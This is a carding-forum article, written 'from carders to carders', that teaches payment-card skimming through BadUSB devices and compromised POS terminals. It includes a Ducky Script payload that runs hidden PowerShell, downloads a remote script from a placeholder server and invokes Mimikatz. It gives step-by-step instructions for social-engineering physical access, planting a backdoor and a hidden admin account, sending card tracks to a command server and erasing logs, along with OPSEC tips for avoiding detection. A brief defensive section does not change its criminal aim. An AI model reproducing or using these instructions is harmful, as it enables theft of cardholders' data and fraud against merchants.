Skimming via hacked firmware of card readers and USB devices: from theory to practice

[Good Carder]

From carders to carders.

Skimming is no longer about ATM overlays and keypads. 2028 is the year of system-level attacks, where the card reader itself becomes your agent. BadUSB, POS terminal traffic interception via Bluetooth, keyboard emulation via USB Rubber Ducky — all this turns an "honest" device into a data theft tool.

In this article, I'll explain how BadUSB attacks are used to compromise payment software, how physical access to a USB port turns into remote theft of track numbers and PIN codes, which POS terminal vulnerabilities allow instant root access, and how all this is converted into dumps for cloning. I'll include real-world cases, hardware modification instructions, and protection methods — so you know how to avoid falling into your own trap.

I won't go into unnecessary detail about BadUSB as a class of attacks. That's already clear. But the true, hidden essence of this technique is much deeper. The BadUSB attack is based on a fundamental flaw in the USB protocol — the lack of strict control over device types, which is easily exploited with specialized software. Today, we're moving from physical skimming to firmware-level hardware and software hacking.

Part 1: USB Firmware Vulnerabilities and BadUSB Attacks​

BadUSB exploits the reprogrammable nature of USB microcontrollers. The carder completely rewrites the device's firmware, turning a harmless flash drive into a spy tool. The firmware remains intact even after reinstalling the operating system, and standard antivirus software cannot detect it.

1.1. Example: BadUSB 2.0 MITM System​

The five-class attack architecture includes:

• Eavesdrop Class (Passive Interception). This class simply listens and stores the entire keystroke stream to the file system for later analysis. This passive data collection occurs without notifying the target user. The intercepted keystroke data is written to /tmp/badusb2-recorded, where it can be read later.
• Modify Class (Substitution). This attack alters keystrokes on the fly, allowing one-time passwords (OTPs) to be attacked or user input to be spoofed. In the proof-of-concept implementation, the code simply decreases the keycode value.
• Replay Class (Replay Attack). Automatically detects login sessions and intercepts entered credentials (login/password) for subsequent replay.
• Fabricate Class (Active Injection). Injects arbitrary commands (including PowerShell scripting) or embeds files into the system. This allows, for example, the installation of malware that executes commands remotely.
• Exfiltrate Class (Exfiltration). This class transmits data externally via Morse code using LED keys, which is transmitted via the display screen's operating parameters using encoding.

1.2. Equipment: from DIY solutions to ready-made devices​

You don't need to be an engineer to carry out an attack. All you need are readily available tools, off-the-shelf commercial devices, or specialized software.

• The USB Rubber Ducky is the gold standard of HID emulation. You plug in the device, it's recognized as a keyboard in seconds, and it injects a pre-prepared payload. The device operates at lightning speed—commands that disable protections and create backdoors are executed faster than you can blink. However, the Rubber Ducky is more often used for attacks on terminals by staff or in test lab environments.
• Flipper Zero (around $170). A versatile multi-tool that can emulate HID devices (keyboards) and read and clone RFID/NFC tags. Its popularity has skyrocketed due to its compact size and ease of use.
• Teensy is a DIY alternative for those who prefer to build their own hardware. This microcontroller is programmable using Arduino and can emulate a keyboard, mouse, or a combination of both.
• A custom Python script for BadUSB allows for flexible attack customization. For example, the open-source project withdk/badusb2-mitm-poc demonstrates the operation of a MITM system and the implementation of the five attack classes discussed earlier.

Key point: Tools like BadUSB and Rubber Ducky completely bypass traditional USB locks, as the system sees them as standard keyboards that it trusts.

Part 2. POS terminals as the main target: from physical access to root access​

POS terminals are an ideal target for attacks via BadUSB and firmware modification. They are always connected to the network, process thousands of cards per day, and are often operated by employees whose vigilance leaves much to be desired.

2.1. CVE-2025-4371: BadCam and webcam attack​

In 2025, vulnerability CVE-2025-4371 was discovered in some Lenovo webcam models. Researchers (dubbed BadCam) demonstrated how a hacked webcam could act as a BadUSB device, transforming it into a keyboard and injecting malicious commands into the system.

2.2. Worldline Yomani XR Vulnerability: 30 Seconds to Full Control​

Swiss developer Stephane Glore discovered a critical vulnerability in the popular Swiss payment terminal, the Worldline Yomani XR. An unprotected debug port was hidden behind a discreet flap on the rear panel of the terminal. Connecting a standard serial cable, the researcher discovered that the terminal was running Linux (kernel version 3.6). Most surprisingly, after booting the system, entering "root" without a password was sufficient to obtain a shell. This was because the debug interface was unprotected.

This unauthorized access allowed the injecting of malicious code, intercepting all traffic passing through the terminal, or interrupting system updates. Although card data was processed in a second, more secure environment and remained inaccessible, overall control of the device allowed manipulation of network communications and the identification of other vulnerabilities within the processing network's communication channel.

2.3. PAX D177 Vulnerability: SoC Substitution and Firmware Signature​

Researcher Lucas Tuske attempted to hack a PAX D177 PoS terminal and discovered several layers of protection. A tamper-evident trigger prevents access to the flash memory, and the firmware is digitally signed, making it impossible to forge. Furthermore, the keys in the NVRAM (non-volatile memory) are erased upon opening, rendering the device useless. However, the researcher found a way around this: he completely replaced the original SoC with a new one. The device ceased to function as a payment terminal, but it became possible to run custom code, opening the way for the creation of malicious payloads capable of doing anything with the card reader. The method is complex, but fundamentally feasible. Another point: attacks on such devices use ARM Cortex-M3 cores, which simplifies the task, as their architecture is well-documented.

2.4. Obtaining root access to a POS terminal: step-by-step​

1. Physical access to the terminal (can be arranged under the guise of “technical maintenance”).
2. Using debug interfaces (UART, JTAG, SPI), which are often retained on boards and allow direct interaction with the terminal, bypassing security mechanisms. Techniques include extracting firmware through such interfaces to search for vulnerabilities in the code or to extract encryption keys.
3. Modifying firmware to perform malicious operations, such as collecting card data or cloning transactions.
4. Reflashing the device with modified firmware (via USB, JTAG or network).
5. Data collection (exfiltration) via malicious code embedded in new firmware. Collected card data and PIN codes are sent to your server.

Part 3. CCID and APDU Vulnerabilities: When Card Readers Reveal Secrets​

Some vulnerabilities arise at the communication protocol level between the card and the reader. For example, CCID (Chip/Smart Card Interface Devices) and APDU (Application Protocol Data Units). APDU vulnerabilities have been discovered in many popular brands (IDtech, Ingenico, Verifone, etc.) and allow complete control of the payment reader with a simple touch. A specialized Android app using NFC can cause a denial of service, compromise the device collecting and transmitting card data, alter the transaction amount, and even gain control of the host through SDK vulnerabilities.

For a better understanding, here is a list of potentially vulnerable components that can be compromised via APDU:

Component	Vulnerabilities	Potential consequences
NFC firmware	Buffer overflow, command injection	Full control over the card reader, theft of card data
Card reader drivers (CCID)	Downloading unauthorized firmware	Arbitrary code execution, backdoor
Host SDK	Lack of validation of input data	Further compromise of the POS system
Secure Elements	Vulnerabilities in cryptographic implementations	Extracting encryption keys

A classic attack example: Create a malicious Android app and use it to send specially crafted APDU requests to an NFC card reader. This can alter the transaction amount at the POS terminal without the cashier noticing.

In one case, an IDtech skimmer exploited vulnerabilities in APDU protocols to intercept magnetic stripe data on the host system. The attacker could trick the card reader into thinking it was processing a payment from a real card, when in fact, the data was generated by the criminal's phone.

Part 4. Practical Implementation of the BadUSB Attack​

We've gathered all the information together. Now let's write a step-by-step plan that will turn theory into practice.

4.1. Necessary equipment and software​

Hardware:

• USB Rubber Ducky or Flipper Zero for keyboard emulation.
• Arduino Micro/Pro Micro (programmable as HID device) for DIY projects.
• FTDI adapter for connecting to debug interfaces (UART, JTAG, SPI) of a POS terminal.
• (Optional) SDR device for intercepting and analyzing radio and NFC signals (may be required for card emulation).

Software:

• Payload (script) for BadUSB (for example, a Powershell script for data exfiltration or backdoor installation).
• Utilities for flashing chips and gaining root access.
• Malicious POS terminal firmware (or a patch) that will send data to your server (written in C/C++ for the target ARM-Cortex or other architecture).

4.2. Step 1: Reconnaissance and Payload Preparation​

Build or write a payload that will launch your attack after BadUSB is inserted.

# Пример пэйлоада для PowerShell (Ducky Script)
REM Title: Ducky Payload for Information Stealing
DELAY 200
GUI r
DELAY 300
STRING powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://yourserver.com/payload.ps1'); Invoke-Mimikatz"
ENTER
DELAY 500

What useful software should do:

• Collection of credentials: Logins, passwords, cached encryption keys (can help in intercepting traffic).
• Saving card data: If the terminal interacts with cards (which is required), the script must be able to intercept the entered data.
• Create a backdoor: Open a port for remote control to attack the terminal again whenever needed.
• Sending data: Send everything intercepted to your C&C server.

4.3. Step 2: Physical Implementation​

Use social engineering to gain physical access to the terminal. Simple tape and work clothes can work wonders. Connect BadUSB to a USB port.

4.4. Step 3: Installing a permanent backdoor through a series of commands​

Your BadUSB device will send a series of quick commands. It can:

1. Download and install malware on your computer to periodically send transaction tracks to your server.
2. Collect cached credentials to log into the POS admin panel.
3. Disable the system's defense mechanisms temporarily.
4. Create a hidden user with administrative privileges.

4.5. Step 4: Data Collection and Exfiltration​

The malware configured in the POS system will record all card tracking information as it passes through the terminal and send it to your server. It will also scan the system for encryption keys and payment gateway configuration files.

4.6. Step 5: Covering Your Tracks​

After implementation:

• Clear your system logs to ensure no traces of your visit remain.
• Restore the integrity of the firmware, if possible, so that the owners do not suspect something is wrong.
• Physically remove all traces of tampering with the terminal and its housing.

Part 5. Defense and Countermeasures (Blue Team)​

These measures will help you protect your POS systems and card readers from such attacks:

1. USB Whitelisting. USB Whitelisting allows the use of only those USB devices whose VID/PID are signed with a corporate certificate.
2. Firmware integrity check. You should verify the hashes of critical binaries responsible for security.
3. Physical security: Don't leave USB ports accessible. Use USB locks, block ports in the BIOS, and seal debug connectors (UART, JTAG) with special seals.
4. Monitor anomalies. Use SIEM for logs. Unusual network traffic, PowerShell execution from unknown locations, file modifications in system directories — send these to the SOC. Use EDR systems to monitor key nodes.

Part 6. OPSEC and Prevention​

1. Test your devices. BadUSB is a powerful tool that requires testing on cloned target systems. If you're unsure, don't use it.
2. Be prepared to "burn" your equipment. Use only equipment that can be thrown away (or that you don't mind wasting). Consider disposable machines, disposable SIM cards, and disposable proxies.

Resume from a carder​

Classic skimmers are becoming a thing of the past, giving way to hardware and software hacking. BadUSB, Rubber Ducky, and similar devices emulate HID (keyboards) and enter commands on terminals without users noticing. POS terminals are an ideal target, as firmware vulnerabilities (such as the Worldline Yomani XR vulnerability) or debug interfaces (UART, JTAG) can be used to gain complete control of the device and steal transaction streams, turning them into cloning dumps.

BadUSB 2.0 implements the full stack: keyboard input spoofing (Eavesdrop, Modify), replay attacks (Replay), script and file injection (Fabricate), and covert data exfiltration via Morse code (Exfiltrate).

A quick one-line reminder:
"BadUSB isn't magic, it's microcontroller reflashing." POS terminals are hacked using UART debugging in 30 seconds. Encryption keys are the target. BadUSB 2.0 MITM System: interception, substitution, replay, injection. USB Rubber Ducky injects scripts at 1000+ characters per second. Flipper Zero emulates everything from a keyboard to an RFID key. 4 simple steps: PAYLOAD → USB → C&C → CLONE. USB device security is dead – remember that.